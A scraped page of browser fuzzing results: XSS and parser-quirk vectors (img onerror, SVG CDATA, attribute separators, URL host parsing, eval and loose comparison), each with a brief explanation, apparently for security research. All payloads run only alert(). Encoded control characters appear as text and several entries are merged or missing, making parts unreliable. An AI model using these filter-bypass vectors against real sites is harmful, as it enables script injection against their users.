Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 174 vectors with results
<a href="//0x09example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters after double slashes. It uses a base tag to get round the sandboxed iframe problems.
<a href="//
example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters after double slashes. It uses a base tag to get round the sandboxed iframe problems.
<a href="//0x0Dexample2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters after double slashes. It uses a base tag to get round the sandboxed iframe problems.
<a href="///example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters after double slashes. It uses a base tag to get round the sandboxed iframe problems.
<a href="//@example2.com" id=x></a>This is an example how you can use the XSS type to fuzz URLs. This one fuzzes characters after double slashes. It uses a base tag to get round the sandboxed iframe problems.
<svg><style>⟦0D⟧
x = "<![CDATA[</style><img title="]]]></style></svg><img src onerror=alert(93)>">This vector shows which characters are allowed in-between right closing bracket in a CDATA section in SVG.
var markup = `<a0x09id=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
alert(9)0x0D
}0x0D
0x0D
0x0D
This vector shows which characters can be used instead of the normal space to work as an attribute seperator
var markup = `<a
id=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
alert(10)0x0D
}0x0D
0x0D
0x0D
This vector shows which characters can be used instead of the normal space to work as an attribute seperator
var markup = `<a0x0Cid=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
alert(12)0x0D
}0x0D
0x0D
0x0D
This vector shows which characters can be used instead of the normal space to work as an attribute seperator
var markup = `<a0x0Did=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
alert(13)0x0D
}0x0D
0x0D
0x0D
This vector shows which characters can be used instead of the normal space to work as an attribute seperator
var markup = `<a id=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
alert(32)0x0D
}0x0D
0x0D
0x0D
This vector shows which characters can be used instead of the normal space to work as an attribute seperator
if('1337' + String.fromCodePoint(9) + String.fromCodePoint(9) == 1337){alert(9)}Loose comparison of string with appended character, which still end up type coerced.
if('1337' + String.fromCodePoint(10) + String.fromCodePoint(10) == 1337){alert(10)}Loose comparison of string with appended character, which still end up type coerced.
if('1337' + String.fromCodePoint(11) + String.fromCodePoint(11) == 1337){alert(11)}Loose comparison of string with appended character, which still end up type coerced.
if('1337' + String.fromCodePoint(12) + String.fromCodePoint(12) == 1337){alert(12)}Loose comparison of string with appended character, which still end up type coerced.
if('1337' + String.fromCodePoint(13) + String.fromCodePoint(13) == 1337){alert(13)}Loose comparison of string with appended character, which still end up type coerced.
if (new URL("https://0x09google.com/endpoint").host=="google.com"){alert(9)}Characters ignored in URL, which yield in the same host property. This is just a simple modification of another fuzzing vector by hansmachine
if (new URL("https:///google.com/endpoint").host=="google.com"){alert(47)}Characters ignored in URL, which yield in the same host property. This is just a simple modification of another fuzzing vector by hansmachine
if (new URL("https://@google.com/endpoint").host=="google.com"){alert(64)}Characters ignored in URL, which yield in the same host property. This is just a simple modification of another fuzzing vector by hansmachine
if (new URL("https://\google.com/endpoint").host=="google.com"){alert(92)}Characters ignored in URL, which yield in the same host property. This is just a simple modification of another fuzzing vector by hansmachine
if (new URL("https://google.com/endpoint").host=="google.com"){alert(173)}Characters ignored in URL, which yield in the same host property. This is just a simple modification of another fuzzing vector by hansmachine
prompt?.();alert(63)eval('0x09alert(9)0x09')I was asking myself which characters can be used in eval with single quotes that still allow code execution.
eval('0x0Balert(11)0x0B')I was asking myself which characters can be used in eval with single quotes that still allow code execution.
eval('0x0Calert(12)0x0C')I was asking myself which characters can be used in eval with single quotes that still allow code execution.
eval(' alert(32) ')I was asking myself which characters can be used in eval with single quotes that still allow code execution.
eval(';alert(59);')I was asking myself which characters can be used in eval with single quotes that still allow code execution.
<div a="><!-- "></div><img src=x:x onerror=alert(34) -->This vector shows which characters act like quotes by nullifying a HTML comment.
<div a='><!-- '></div><img src=x:x onerror=alert(39) -->This vector shows which characters act like quotes by nullifying a HTML comment.
<div 0x09="><img src=x:x onerror=alert(9)>"></div>This vector shows which characters when used as an attribute name are ignored by the HTML parser and allow the image to execute.
<div
="><img src=x:x onerror=alert(10)>"></div>This vector shows which characters when used as an attribute name are ignored by the HTML parser and allow the image to execute.
<div 0x0C="><img src=x:x onerror=alert(12)>"></div>This vector shows which characters when used as an attribute name are ignored by the HTML parser and allow the image to execute.
<div 0x0D="><img src=x:x onerror=alert(13)>"></div>This vector shows which characters when used as an attribute name are ignored by the HTML parser and allow the image to execute.
<div ="><img src=x:x onerror=alert(32)>"></div>This vector shows which characters when used as an attribute name are ignored by the HTML parser and allow the image to execute.
<div a="><!-- "></div><img src=x:x onerror=alert(34) -->This vector shows which characters act like quotes by nullifying a HTML comment.
<div a='><!-- '></div><img src=x:x onerror=alert(39) -->This vector shows which characters act like quotes by nullifying a HTML comment.
if (new URL("https://" + String.fromCodePoint(91) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(91)}if (new URL("https://" + String.fromCodePoint(65095) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(65095)}if (new URL("https://" + String.fromCodePoint(65339) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(65339)}"0x091337"==1337&&alert(9)This vector shows what characters are ignored when comparing a string without strict comparison
"0x0B1337"==1337&&alert(11)This vector shows what characters are ignored when comparing a string without strict comparison
"0x0C1337"==1337&&alert(12)This vector shows what characters are ignored when comparing a string without strict comparison
" 1337"==1337&&alert(32)This vector shows what characters are ignored when comparing a string without strict comparison
"+1337"==1337&&alert(43)This vector shows what characters are ignored when comparing a string without strict comparison
({"x\0x0D0x0D
":1337}.x)==1337&&alert(13)This vector shows what characters are ignored in a multiline string after the backslash
This vector shows what characters used in a multiline string after the backslash
This vector shows what characters used in a multiline string after the backslash
This vector shows what characters used in a multiline string after the backslash
This vector shows what characters used in a multiline string after the backslash
<img src=data: onerror="1> alert(65279)">This vector shows which characters are ignored after the greater than entity without a semi-colon
<img src=data: onerror="1>
alert(8232)">This vector shows which characters are ignored after the greater than entity without a semi-colon
<img src=data: onerror="1>> alert(62)">This vector shows which characters are ignored after the greater than entity without a semi-colon
<img src=data: onerror="1>~ alert(126)">This vector shows which characters are ignored after the greater than entity without a semi-colon
<img src=data: onerror="1> alert(12288)">This vector shows which characters are ignored after the greater than entity without a semi-colon
<img src=data: onerror="1&-alert(45)">This vector shows what characters are allowed after a malformed names entity.
<img src=data: onerror="1&
alert(10)">This vector shows what characters are allowed after a malformed names entity.
<img src=data: onerror="1& alert(8201)">This vector shows what characters are allowed after a malformed names entity.
<img src=data: onerror="1& alert(8192)">This vector shows what characters are allowed after a malformed names entity.
<img src=data: onerror="1& alert(8195)">This vector shows what characters are allowed after a malformed names entity.
<form id="test" action="aaa0x00onsubmit=alert(1)><input/type='submit'>0x0D
Characters allowed to break double quotes in the action attribute